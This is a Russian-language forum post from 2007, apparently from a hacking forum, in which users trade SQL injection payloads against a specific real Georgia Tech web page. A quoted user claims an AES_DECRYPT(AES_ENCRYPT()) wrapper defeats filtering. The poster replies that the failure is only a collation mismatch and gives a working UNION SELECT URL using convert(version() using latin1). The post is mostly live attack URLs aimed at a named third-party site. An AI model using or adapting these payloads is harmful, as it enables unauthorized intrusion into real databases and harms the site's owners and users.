30.04.2007, 13:29
|
|
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346
Репутация:
1719
|
|
Сообщение от -=lebed=-
Обход фильтрации через AES_DECRYPT(AES_ENCRYPT())
Код:
_http://hcc.cc.gatech.edu/taxonomy/cat.php?cat=-111+union+select+version()/* - так облом, а вот так:
_http://hcc.cc.gatech.edu/taxonomy/cat.php?cat=-111+union+select+AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71)/* - нет облома ;)
какая еще фильтрация?  просто кодировки не сочетаются.
Query failed: Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'
нужно просто convert(version()+using+latin1)/*
Код:
http://hcc.cc.gatech.edu/taxonomy/cat.php?cat=-111+union+select+convert(version()+using+latin1)/*
//с кем не бывает.. 
Последний раз редактировалось n1†R0x; 30.04.2007 в 13:37..
|
|
|